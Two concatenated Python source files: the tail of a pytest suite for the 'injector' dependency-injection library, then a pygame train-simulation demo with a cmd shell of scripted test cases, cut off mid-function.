self.injector.binder.bind(self.cls, scope=singleton)
a, b = self.gather_results(2)
assert (a is b)
def test_provider_and_scope_decorator_collaboration():
@provider
@singleton
def provider_singleton() -> int:
return 10
@singleton
@provider
def singleton_provider() -> int:
return 10
assert provider_singleton.__binding__.scope == SingletonScope
assert singleton_provider.__binding__.scope == SingletonScope
def test_injecting_into_method_of_object_that_is_falseish_works():
# regression test
class X(dict):
@inject
def __init__(self, s: str):
pass
injector = Injector()
injector.get(X)
def test_injection_fails_when_injector_cant_install_itself_into_an_object_with_slots():
try:
class ClassName:
__slots__ = ()
injector = Injector()
injector.get(ClassName)
except Exception as e:
check_exception_contains_stuff(e, ('ClassName', '__slots__'))
else:
assert False, 'Should have raised an exception and it didn\'t'
def test_deprecated_module_configure_injection():
class Test(Module):
@inject
def configure(self, binder, name: int):
pass
class Test2(Module):
@inject
def __init__(self, name: int):
pass
@inject
def configure(binder, name: int):
pass
for module in [Test, Test2, configure, Test()]:
with warnings.catch_warnings(record=True) as w:
print(module)
Injector(module)
assert len(w) == 1, w
def test_callable_provider_injection():
Name = Key("Name")
Message = Key("Message")
@inject
def create_message(name: Name):
return "Hello, " + name
def configure(binder):
binder.bind(Name, to="John")
binder.bind(Message, to=create_message)
injector = Injector([configure])
msg = injector.get(Message)
assert msg == "Hello, John"
def test_providerof():
counter = [0]
def provide_str():
counter[0] += 1
return 'content'
def configure(binder):
binder.bind(str, to=provide_str)
injector = Injector(configure)
assert counter[0] == 0
provider = injector.get(ProviderOf[str])
assert counter[0] == 0
assert provider.get() == 'content'
assert counter[0] == 1
assert provider.get() == injector.get(str)
assert counter[0] == 3
def test_providerof_cannot_be_bound():
def configure(binder):
binder.bind(ProviderOf[int], to=InstanceProvider(None))
with pytest.raises(Exception):
Injector(configure)
def test_providerof_is_safe_to_use_with_multiple_injectors():
def configure1(binder):
binder.bind(int, to=1)
def configure2(binder):
binder.bind(int, to=2)
injector1 = Injector(configure1)
injector2 = Injector(configure2)
provider_of = ProviderOf[int]
provider1 = injector1.get(provider_of)
provider2 = injector2.get(provider_of)
assert provider1.get() == 1
assert provider2.get() == 2
def test_special_interfaces_work_with_auto_bind_disabled():
class InjectMe:
pass
def configure(binder):
binder.bind(InjectMe, to=InstanceProvider(InjectMe()))
injector = Injector(configure, auto_bind=False)
# This line used to fail with:
# Traceback (most recent call last):
# File "/projects/injector/injector_test.py", line 1171,
# in test_auto_bind_disabled_regressions
# injector.get(ProviderOf(InjectMe))
# File "/projects/injector/injector.py", line 687, in get
# binding = self.binder.get_binding(None, key)
# File "/projects/injector/injector.py", line 459, in get_binding
# raise UnsatisfiedRequirement(cls, key)
# UnsatisfiedRequirement: unsatisfied requirement on
# <injector.ProviderOf object at 0x10ff01550>
injector.get(ProviderOf[InjectMe])
# This used to fail with an error similar to the ProviderOf one
injector.get(ClassAssistedBuilder[InjectMe])
def test_binding_an_instance_regression():
text = b'hello'.decode()
def configure(binder):
# Yes, this binding doesn't make sense strictly speaking but
# it's just a sample case.
binder.bind(bytes, to=text)
injector = Injector(configure)
# This used to return empty bytes instead of the expected string
assert injector.get(bytes) == text
def test_class_assisted_builder_of_partially_injected_class_old():
class A:
pass
class B:
@inject
def __init__(self, a: A, b: str):
self.a = a
self.b = b
class C:
@inject
def __init__(self, a: A, builder: ClassAssistedBuilder[B]):
self.a = a
self.b = builder.build(b='C')
c = Injector().get(C)
assert isinstance(c, C)
assert isinstance(c.b, B)
assert isinstance(c.b.a, A)
def test_implicit_injection_for_python3():
class A:
pass
class B:
@inject
def __init__(self, a:A):
self.a = a
class C:
@inject
def __init__(self, b:B):
self.b = b
injector = Injector()
c = injector.get(C)
assert isinstance(c, C)
assert isinstance(c.b, B)
assert isinstance(c.b.a, A)
def test_annotation_based_injection_works_in_provider_methods():
class MyModule(Module):
def configure(self, binder):
binder.bind(int, to=42)
@provider
def provide_str(self, i: int) -> str:
return str(i)
@singleton
@provider
def provide_object(self) -> object:
return object()
injector = Injector(MyModule)
assert injector.get(str) == '42'
assert injector.get(object) is injector.get(object)
def test_assisted_building_is_supported():
class Fetcher:
def fetch(self, user_id):
assert user_id == 333
return {'name': 'John'}
class Processor:
@noninjectable('provider_id')
@inject
@noninjectable('user_id')
def __init__(self, fetcher: Fetcher, user_id: int, provider_id: str):
assert provider_id == 'not injected'
data = fetcher.fetch(user_id)
self.name = data['name']
def configure(binder):
binder.bind(int, to=897)
binder.bind(str, to='injected')
injector = Injector(configure)
processor_builder = injector.get(AssistedBuilder[Processor])
with pytest.raises(CallError):
processor_builder.build()
processor = processor_builder.build(user_id=333, provider_id='not injected')
assert processor.name == 'John'
def test_raises_when_noninjectable_arguments_defined_with_invalid_arguments():
with pytest.raises(UnknownArgument):
class A:
@inject
@noninjectable('c')
def __init__(self, b: str):
self.b = b
def test_can_create_instance_with_untyped_noninjectable_argument():
class Parent:
@inject
@noninjectable('child1', 'child2')
def __init__(self, child1, *, child2):
self.child1 = child1
self.child2 = child2
injector = Injector()
parent_builder = injector.get(AssistedBuilder[Parent])
parent = parent_builder.build(child1='injected1', child2='injected2')
assert parent.child1 == 'injected1'
assert parent.child2 == 'injected2'
def test_implicit_injection_fails_when_annotations_are_missing():
class A:
def __init__(self, n):
self.n = n
injector = Injector()
with pytest.raises(CallError):
injector.get(A)
def test_injection_works_in_presence_of_return_value_annotation():
# Code with PEP 484-compatible type hints will have __init__ methods
# annotated as returning None[1] and this didn't work well with Injector.
#
# [1] https://www.python.org/dev/peps/pep-0484/#the-meaning-of-annotations
class A:
@inject
def __init__(self, s: str) -> None:
self.s = s
def configure(binder):
binder.bind(str, to='this is string')
injector = Injector([configure])
# Used to fail with:
# injector.UnknownProvider: couldn't determine provider for None to None
a = injector.get(A)
# Just a sanity check, if the code above worked we're almost certain
# we're good but just in case the return value annotation handling changed
# something:
assert a.s == 'this is string'
def test_things_dont_break_in_presence_of_args_or_kwargs():
class A:
@inject
def __init__(self, s: str, *args: int, **kwargs: str):
assert not args
assert not kwargs
injector = Injector()
# The following line used to fail with something like this:
# Traceback (most recent call last):
# File "/ve/injector/injector_test_py3.py", line 192,
# in test_things_dont_break_in_presence_of_args_or_kwargs
# injector.get(A)
# File "/ve/injector/injector.py", line 707, in get
# result = scope_instance.get(key, binding.provider).get(self)
# File "/ve/injector/injector.py", line 142, in get
# return injector.create_object(self._cls)
# File "/ve/injector/injector.py", line 744, in create_object
# init(instance, **additional_kwargs)
# File "/ve/injector/injector.py", line 1082, in inject
# kwargs=kwargs
# File "/ve/injector/injector.py", line 851, in call_with_injection
# **dependencies)
# File "/ve/injector/injector_test_py3.py", line 189, in __init__
# assert not kwargs
# AssertionError: assert not {'args': 0, 'kwargs': ''}
injector.get(A)
def test_forward_references_in_annotations_are_handled():
# See https://www.python.org/dev/peps/pep-0484/#forward-references for details
def configure(binder):
binder.bind(X, to=X('hello'))
@inject
def fun(s: 'X') -> 'X':
return s
# The class needs to be module-global in order for the string -> object
# resolution mechanism to work. I could make it work with locals but it
# doesn't seem worth it.
global X
class X:
def __init__(self, message: str) -> None:
self.message = message
try:
injector = Injector(configure)
assert injector.call_with_injection(fun).message == 'hello'
finally:
del X
def test_more_useful_exception_is_raised_when_parameters_type_is_any():
@inject
def fun(a: Any) -> None:
pass
injector = Injector()
# This was the exception before:
#
# TypeError: Cannot instantiate <class 'typing.AnyMeta'>
#
# Now:
#
# injector.CallError: Call to AnyMeta.__new__() failed: Cannot instantiate
# <class 'typing.AnyMeta'> (injection stack: ['injector_test_py3'])
#
# In this case the injection stack doesn't provide too much information but
# it quickly gets helpful when the stack gets deeper.
with pytest.raises((CallError, TypeError)):
injector.call_with_injection(fun)
def test_optionals_are_ignored_for_now():
@inject
def fun(s: str = None):
return s
assert Injector().call_with_injection(fun) == ''
def test_class_assisted_builder_of_partially_injected_class():
class A:
pass
class B:
@inject
def __init__(self, a: A, b: str):
self.a = a
self.b = b
class C:
@inject
def __init__(self, a: A, builder: ClassAssistedBuilder[B]):
self.a = a
self.b = builder.build(b='C')
c = Injector().get(C)
assert isinstance(c, C)
assert isinstance(c.b, B)
assert isinstance(c.b.a, A)
# The test taken from Alec Thomas' pull request: https://github.com/alecthomas/injector/pull/73
def test_child_scope():
TestKey = Key('TestKey')
TestKey2 = Key('TestKey2')
def parent_module(binder):
binder.bind(TestKey, to=object, scope=singleton)
def first_child_module(binder):
binder.bind(TestKey2, to=object, scope=singleton)
def second_child_module(binder):
binder.bind(TestKey2, to='marker', scope=singleton)
injector = Injector(modules=[parent_module])
first_child_injector = injector.create_child_injector(modules=[first_child_module])
second_child_injector = injector.create_child_injector(modules=[second_child_module])
assert first_child_injector.get(TestKey) is first_child_injector.get(TestKey)
assert first_child_injector.get(TestKey) is second_child_injector.get(TestKey)
assert first_child_injector.get(TestKey2) is not second_child_injector.get(TestKey2)
def test_custom_scopes_work_as_expected_with_child_injectors():
class CustomSingletonScope(SingletonScope):
pass
custom_singleton = ScopeDecorator(CustomSingletonScope)
def parent_module(binder):
binder.bind(str, to='parent value', scope=custom_singleton)
def child_module(binder):
binder.bind(str, to='child value', scope=custom_singleton)
parent = Injector(modules=[parent_module])
child = parent.create_child_injector(modules=[child_module])
print('parent, child: %s, %s' % (parent, child))
assert parent.get(str) == 'parent value'
assert child.get(str) == 'child value'
# Test for https://github.com/alecthomas/injector/issues/75
def test_inject_decorator_does_not_break_manual_construction_of_pyqt_objects():
class PyQtFake:
@inject
def __init__(self):
pass
def __getattribute__(self, item):
if item == '__injector__':
raise RuntimeError(
'A PyQt class would raise this exception if getting '
'self.__injector__ before __init__ is called and '
'self.__injector__ has not been set by Injector.')
return object.__getattribute__(self, item)
instance = PyQtFake() # This used to raise the exception
assert isinstance(instance, PyQtFake)
def test_using_an_assisted_builder_with_a_provider_raises_an_injector_error():
class A:
pass
class MyModule(Module):
@provider
def provide_a(self, builder: AssistedBuilder[A]) -> A:
return builder.build()
injector = Injector(MyModule)
with pytest.raises(Error):
injector.get(A)
def test_newtype_integration_works():
UserID = NewType('UserID', int)
def configure(binder):
binder.bind(UserID, to=123)
injector = Injector([configure])
assert injector.get(UserID) == 123
|
demo.py | import pygame
from pygame import image
from pygame.locals import *
import trainLib as lib
import time
import cmd, sys
import threading as th
# globals
globalGrid = None
stopDisplay = False
isDisplaying = False
displayThread = None
isDirty = False # needs sync across pygame and cmd threads.
trainPosRow = -1 # needs sync
trainPosCol = -1 # needs sync
train = None
tell = True
BLACK = (0, 0, 0)
WHITE = (200, 200, 200)
imageWidth = 200
#WINDOW_HEIGHT = 800
#WINDOW_WIDTH = 800
def rot_center(image, angle):
loc = image.get_rect().center
rot_sprite = pygame.transform.rotate(image, angle)
rot_sprite.get_rect().center = loc
return rot_sprite
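# Note: the `rot_sprite.get_rect().center = loc` line above mutates a
# temporary Rect and is therefore a no-op; callers only use the returned
# Surface and position it on the grid themselves, so only the rotation matters.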
# Reg Reg Rig Lef
# x2S1 x1S3 Lc x2S2
# st br x1S1 Lc
# x3Ri x1S1 Lef Reg
def pygameDisplay(threadName, row, col):
global SCREEN, CLOCK
pygame.init()
WINDOW_HEIGHT = row*200
WINDOW_WIDTH = col*200
SCREEN = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))
CLOCK = pygame.time.Clock()
SCREEN.fill(BLACK)
# Prepare images to display later.
regularImg = pygame.image.load("straightRoad.png")
bgImg = pygame.image.load("bg.png")
rightImage = pygame.image.load("rightTurn.png")
switch1Img = pygame.image.load("switch1.png")
switch2Img = pygame.image.load("switch2.png")
switch3Img = pygame.image.load("switch3.png")
levelCrossingImg = pygame.image.load("levelCrossing.png")
stationImg = pygame.image.load("station.png")
bridgeImg = pygame.image.load("bridge.png")
trainImg = pygame.image.load("train.png")
leftImage = pygame.image.load("rightTurn.png")
leftImage = rot_center(leftImage, -90)
topLeftRect = regularImg.get_rect()
global globalGrid
view = []
regularImgCache = {0 : regularImg}
rightImgCache = {0 : rightImage}
leftImgCache = {0 : leftImage}
switch1ImgCache = {0: switch1Img}
switch2ImgCache = {0: switch2Img}
switch3ImgCache = {0: switch3Img}
levelCrossingImgCache = {0: levelCrossingImg}
stationImgCache = {0 : stationImg}
bridgeImgCache = {0: bridgeImg}
trainImgCache = {0: trainImg}
for i in range(0, globalGrid.row):
view.append([])
for j in range(0, globalGrid.col):
elm = globalGrid.grid[i][j]
# print(elm, type(elm), isinstance(elm, lib.CellElement))
if(isinstance(elm, lib.RegularRoad)):
if(elm.visuals == '|'):
view[i].append(regularImg)
elif(elm.visuals == 'R'):
view[i].append(rightImage)
elif(elm.visuals == 'L'):
view[i].append(leftImage)
else:
view[i].append(bgImg)
elif(isinstance(elm, lib.SwitchRoad)):
if(elm.switchType == 1):
view[i].append(switch1Img)
elif(elm.switchType == 2):
view[i].append(switch2Img)
elif(elm.switchType == 3):
view[i].append(switch3Img)
else:
# unknown switch type: bail out of the display thread
return
elif(isinstance(elm, lib.LevelCrossing)):
view[i].append(levelCrossingImg)
elif(isinstance(elm, lib.BridgeCrossing)):
view[i].append(bridgeImg)
elif(isinstance(elm, lib.Station)):
view[i].append(stationImg)
else: # unknown type of cell
# print("this is bg")
view[i].append(bgImg)
trainRect = trainImg.get_rect()
trainRect = pygame.Rect.move(topLeftRect, -200, -200)
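# Park the train one tile off-screen until a position is reported.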
i = 0
global stopDisplay, isDirty, trainPosRow, trainPosCol
while stopDisplay == False:
if(isDirty == True):
isDirty = False
for i in range(0, globalGrid.row):
for j in range(0, globalGrid.col):
elm = globalGrid.grid[i][j]
# print(elm, type(elm), isinstance(elm, lib.CellElement))
if(isinstance(elm, lib.RegularRoad)):
if(elm.visuals == '|'):
if(elm.rotationCount in regularImgCache):
# use that img
view[i][j] = regularImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("straightRoad.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
regularImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
elif(elm.visuals == 'R'):
if(elm.rotationCount in rightImgCache):
# use that img
view[i][j] = rightImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("rightTurn.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
rightImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
elif(elm.visuals == 'L'):
if(elm.rotationCount in leftImgCache):
# use that img
view[i][j] = leftImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("rightTurn.png")
rotatedImg = rot_center(rotatedImg, -90 * (elm.rotationCount + 1))
leftImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
else:
view[i][j] =(bgImg)
elif(isinstance(elm, lib.SwitchRoad)):
if(elm.switchType == 1):
if(elm.rotationCount in switch1ImgCache):
# use that img
view[i][j] = switch1ImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("switch1.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
switch1ImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
elif(elm.switchType == 2):
if(elm.rotationCount in switch2ImgCache):
# use that img
view[i][j] = switch2ImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("switch2.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
switch2ImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
elif(elm.switchType == 3):
if(elm.rotationCount in switch3ImgCache):
# use that img
view[i][j] = switch3ImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("switch3.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
switch3ImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
else:
# unknown switch type: bail out of the display thread
return
elif(isinstance(elm, lib.LevelCrossing)):
if(elm.rotationCount in levelCrossingImgCache):
# use that img
view[i][j] = levelCrossingImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("levelCrossing.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
levelCrossingImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
elif(isinstance(elm, lib.BridgeCrossing)):
if(elm.rotationCount in bridgeImgCache):
# use that img
view[i][j] = bridgeImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("bridge.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
bridgeImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
elif(isinstance(elm, lib.Station)):
if(elm.rotationCount in stationImgCache):
# use that img
view[i][j] = stationImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("station.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
stationImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
else: # unknown type of cell
view[i][j] = bgImg
# update view
if(trainPosCol != -1 and trainPosRow != -1):
trainRect = pygame.Rect.move(topLeftRect, trainPosCol * imageWidth, trainPosRow * imageWidth)
drawGrid(view, topLeftRect)
# draw train On top
SCREEN.blit(trainImg, trainRect)
pygame.display.flip()
time.sleep(0.02)
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
return
elif(event.type == KEYDOWN):
if(event.key == K_q):
pygame.quit()
return
pygame.quit()
def updateView(view):
return
def getRect(row, col):
# global imageWidth
imageWidth = 200
x = col * imageWidth
y = row * imageWidth
return pygame.Rect(0, 0, x, y)
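# Note: getRect() is unused; as written it returns a Rect anchored at the
# origin with width/height (x, y) rather than a tile-sized Rect at (x, y).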
def drawGrid(view, topLeft):
global globalGrid, SCREEN, imageWidth
for i in range(0, globalGrid.row):
for j in range(0, globalGrid.col):
SCREEN.blit(view[i][j], pygame.Rect.move(topLeft, j * imageWidth, i * imageWidth))
class TrainSimCell(cmd.Cmd):
intro = 'Welcome to the TrainSim shell. Type help or ? to list commands.\n'
prompt = '(trainSim) '
file = None
#test cases
def do_testcase1(self,arg):
'''
It tries to create grids of different sizes, gets error messages first, and finally gives a valid command and displays the grid.
'''
global tell
tell = False
print("give grid size out of bounds:")
time.sleep(2)
self.do_creategrid("9 15")
time.sleep(2)
print("\n")
print("give grid size 0:")
time.sleep(2)
self.do_creategrid("0 0")
time.sleep(2)
print("\n")
print("give grid size appropirately:")
time.sleep(2)
print("check the opened window ->")
time.sleep(2)
self.do_creategrid("4 5")
self.do_display([])
time.sleep(1)
tell = True
def do_testcase2(self, arg):
'''
Create a 4x4 grid and add each element type at some positions.
'''
global tell
tell = False
print("Firrst, let's try add elements before createing a grid:")
time.sleep(2)
self.do_addelm("0 0 regular")
time.sleep(2)
print("Ok, grid is created but what if we want to add an elemnet not defined?")
self.do_creategrid("4 4")
time.sleep(2)
self.do_addelm("0 0 people")
time.sleep(2)
print(" what if we want to add an elemnet a not valid cell?")
time.sleep(2)
self.do_addelm("7 7 regular")
time.sleep(2)
print("Now, it is time to add some right elements!")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 0 regular")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 1 rightturn")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 2 leftturn")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 3 switch1")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 0 switch2")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 1 switch3")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 2 levelcrossing")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 3 bridge")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("2 1 station")
time.sleep(1)
self.do_display([])
tell = True
def do_testcase3(self,arg):
'''
Display remove functionality
'''
global tell
tell = False
print("First, let's try to remove elements before createing a grid:")
time.sleep(2)
self.do_removeelm("0 0")
time.sleep(2)
self.do_creategrid("4 4")
print("Ok, grid is created.")
time.sleep(2)
print("Now, it is time to add some elements!")
time.sleep(2)
self.do_display([])
time.sleep(2)
self.do_addelm("0 0 switch3")
time.sleep(2)
self.do_display([])
time.sleep(2)
self.do_addelm("1 1 rightturn")
time.sleep(2)
self.do_display([])
time.sleep(2)
self.do_addelm("1 2 bridge")
time.sleep(2)
self.do_display([])
print("What happens if we wanna remove an empty tile?")
time.sleep(2)
self.do_removeelm("3 3")
time.sleep(2)
print("Let's delete an existing cell")
time.sleep(2)
self.do_removeelm("1 2")
time.sleep(2)
self.do_display([])
tell = True
def do_testcase4(self,arg):
'''
Display rotation functionality
'''
global tell
tell = False
print("First, let's try to rotate something before createing a grid:")
time.sleep(2)
self.do_rotate("1 2 3")
time.sleep(2)
self.do_creategrid("4 4")
print("Ok, grid is created.")
time.sleep(2)
print("Now, it is time to add some elements!")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 0 switch3")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 1 rightturn")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 2 station")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 3 regular")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("2 2 switch1")
time.sleep(1)
self.do_display([])
time.sleep(2)
print("Look at the window! Something will be happen")
time.sleep(2)
self.do_rotate("1 1 2")
time.sleep(2)
self.do_display([])
self.do_rotate("2 0 0")
time.sleep(2)
self.do_display([])
self.do_rotate("1 1 3")
time.sleep(2)
self.do_display([])
self.do_rotate("2 1 1")
time.sleep(2)
self.do_display([])
self.do_rotate("3 2 2")
time.sleep(2)
self.do_display([])
tell = True
def do_testcase5(self, arg):
'''
Displays the getduration & getstop functionality
'''
global tell
tell = False
self.do_creategrid("4 4")
print("Ok, grid is created.")
time.sleep(1)
self.do_addelm("0 0 switch3")
self.do_addelm("1 1 rightturn")
self.do_addelm("2 0 station")
self.do_addelm("1 3 regular")
self.do_addelm("2 2 switch1")
self.do_display([])
time.sleep(1)
print("Let's check values for them")
time.sleep(1)
self.do_getduration("0 0 north")
time.sleep(1)
self.do_getstop("0 0 north")
time.sleep(1)
self.do_getduration("1 1 north")
time.sleep(1)
self.do_getstop("1 1 north")
time.sleep(1)
self.do_getduration("2 0 north")
time.sleep(1)
self.do_getstop("2 0 north")
time.sleep(1)
self.do_getduration("1 3 north")
time.sleep(1)
self.do_getstop("1 3 north")
time.sleep(1)
self.do_getduration("2 2 north")
time.sleep(1)
self.do_getstop("2 2 north")
time.sleep(1)
tell = True
def do_testcase6(self,arg):
'''
Display nextcell & switchstate functionality
'''
self.do_creategrid("4 5")
self.do_addelm("0 0 regular")
self.do_addelm("0 1 regular")
self.do_addelm("0 2 rightturn")
self.do_addelm("2 0 regular")
self.do_addelm("1 0 switch3")
self.do_addelm("1 1 switch2")
self.do_addelm("1 2 switch1")
print("grid is created")
time.sleep(2)
self.do_display([])
time.sleep(2)
print("next cell when enter south to the cell 1 0 -> switch3 element \
(should be 0 0 regular):")
time.sleep(2)
self.do_getnextcell("1 0 south")
time.sleep(2)
print("next cell when enter east to the cell 1 0 -> switch3 elemnt \
(should be 2 0 regular):")
time.sleep(2)
self.do_getnextcell("1 0 east")
time.sleep(2)
print("active piece of switch3 when changeswitchstate 1 time \
(should be R ):")
time.sleep(2)
self.do_changeswitchstate("1 0")
time.sleep(2)
print("new nextcell of switch3 when enter south: \
(Shoud be 1 1 switch2)")
self.do_getnextcell("1 0 south")
time.sleep(2)
print("next cell of switch3 when rotate 1 time entering west\
(should be 2 0 regular):")
time.sleep(1)
self.do_rotate("1 1 0")
time.sleep(1)
self.do_getnextcell("1 0 west")
time.sleep(1)
tell = True
return
def do_testcase7(self,arg):
'''
Create a train at different cells
'''
global tell
tell = False
self.do_creategrid("4 5")
self.do_addelm("0 0 regular")
self.do_addelm("0 1 regular")
self.do_addelm("0 2 rightturn")
self.do_addelm("2 0 regular")
self.do_addelm("1 0 switch3")
self.do_addelm("1 1 switch2")
self.do_addelm("1 2 switch1")
print("grid is created")
time.sleep(1)
self.do_display([])
print("it is time locate trains at some cells.")
time.sleep(1.5)
print("at cel 0 0:")
time.sleep(1.5)
self.do_entercell("0 0 2 north")
time.sleep(1.5)
self.do_display([])
time.sleep(1.5)
print("at cel 1 0:")
time.sleep(1.5)
self.do_entercell("1 0 2 north")
time.sleep(1.5)
self.do_display([])
time.sleep(1.5)
print("at cel 1 1:")
time.sleep(1.5)
self.do_entercell("1 1 2 north")
time.sleep(1.5)
self.do_display([])
time.sleep(1.5)
print("at cel 1 2:")
time.sleep(1.5)
self.do_entercell("1 2 2 north")
time.sleep(1.5)
self.do_display([])
time.sleep(1.5)
print("at cel 3 0 which is a bacground, empty tile:")
time.sleep(1.5)
self.do_entercell("3 0 2 north")
time.sleep(1.5)
self.do_display([])
time.sleep(1)
tell = True
def do_testcase8(self,arg):
'''
Display the advancetrain functionality, which moves the train
'''
global tell
tell = False
self.do_creategrid("4 4")
self.do_addelm("0 0 regular")
self.do_addelm("0 1 regular")
self.do_addelm("0 2 rightturn")
self.do_addelm("2 0 regular")
self.do_addelm("1 0 switch3")
self.do_addelm("1 1 switch2")
self.do_addelm("1 2 switch1")
print("grid is created")
time.sleep(1.5)
self.do_display([])
time.sleep(1.5)
print("it is time locate a trains at cell 0 0.")
time.sleep(1.5)
self.do_entercell("0 0 2 north")
time.sleep(1.5)
print("Let's move!")
time.sleep(1.5)
self.do_advancetrain([])
time.sleep(1.5)
self.do_display([])
time.sleep(1)
self.do_getstatus("1 0")
time.sleep(1.5)
self.do_advancetrain([])
time.sleep(1.5)
self.do_display([])
time.sleep(1)
self.do_getstatus("2 0")
time.sleep(1.5)
self.do_advancetrain([])
time.sleep(1.5)
self.do_display([])
time.sleep(1.5)
tell = True
def do_testcase9(self,args):
'''
it contains some commands to create a visual move
'''
global tell
tell = False
self.do_creategrid("3 3")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 0 switch2")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 1 regular")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 2 leftturn")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 0 bridge")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 1 levelcrossing")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 2 regular")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("2 0 station")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_rotate("1 0 1")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_rotate("1 1 0")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_entercell("2 0 2 south")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_advancetrain([])
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_advancetrain([])
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_advancetrain([])
time.sleep(1)
self.do_display([])
time.sleep(1)
tell = True
def do_getduration(self,arg):
#For now, it just returns the default value and the direction does not matter as long as it is one of the four main directions.
'''
Usage: Enter coordinates (as row column order) and enter direction (lower-case). Exp: getduration 0 0 north
'''
global globalGrid
dirs = { "north" : 0, "east" : 1, "south" : 2 , "west" : 3}
tupleArgs = arg.split()
row = int(tupleArgs[0])
col = int(tupleArgs[1])
entdir = tupleArgs[2]
if(not globalGrid):
print("Please create a grid before hand.")
return
cell = globalGrid.grid[row][col]
if(entdir in dirs.keys()):
if(cell.visuals == '_'):
print("Opps, there is no cell element in that position. Please try again.")
return
else:
duration = cell.getDuration(dirs[entdir])
print("duration for cell: ", (row,col), "is:", duration)
else:
print("Please enter a valid direction.")
def do_getstop(self,arg):
'''
Usage: Enter row col coordinates and entdir. Exp: getstop 0 0 north
'''
#For now, it just returns the default value and the direction does not matter as long as it is one of the four main directions.
global globalGrid
dirs = { "north" : 0, "east" : 1, "south" : 2 , "west" : 3}
tupleArgs = arg.split()
row = int(tupleArgs[0])
col = int(tupleArgs[1])
entdir = (tupleArgs[2])
if(not globalGrid):
print("Please create a grid before hand.")
return
cell = globalGrid.grid[row][col]
if(entdir in dirs.keys()):
if(cell.visuals == '_'):
print("Opps, there is no cell element in that position.")
return
else:
stopTime = cell.getStop(dirs[entdir])
print("stop at cell", (row,col), "for: ", stopTime, "secs")
return
else:
print("Please enter a valid direction.")
return
def do_getstatus(self,args):
'''
Returns the status of the train if there is one in the given cell.
Usage: getstatus row col Exp: getstatus 0 0
'''
global globalGrid
global train
tupleArgs = args.split()
row = int(tupleArgs[0])
col = int(tupleArgs[1])
if(not globalGrid):
print("Please create a grid before hand.")
return
cell = globalGrid.grid[row][col]
if(cell.visuals == '_'):
print("There is no such a cell.")
else:
if(globalGrid.hasTrain(row,col)):
status = train.getStatus()
print(status)
else:
print("The train is not in this cell. Please find it first!")
return
def do_rotate(self, arg):
'''
Usage: rotate rotationCount(int) row col. Exp: rotate 2 1 0 to rotate the cell at row=1 col=0 by 180 degrees CW
'''
global globalGrid,isDirty
tupleArgs = arg.split()
rotCount = int(tupleArgs[0])
row = int(tupleArgs[1])
col = int(tupleArgs[2])
if(not globalGrid):
print("Please create a grid before hand.")
return
cell = globalGrid.grid[row][col]
cell.setOrientation(rotCount)
# now rotate the visuals as well
isDirty = True
def do_entercell(self, arg):
'''
Create and place a train at the given row col with wagoncount many wagons. Cannot create on empty tiles.
entdir determines which side of the tile the train is on. Not visually visible as of now.
Usage: entercell row col wagoncount entdir. Exp: entercell 0 0 2 north
'''
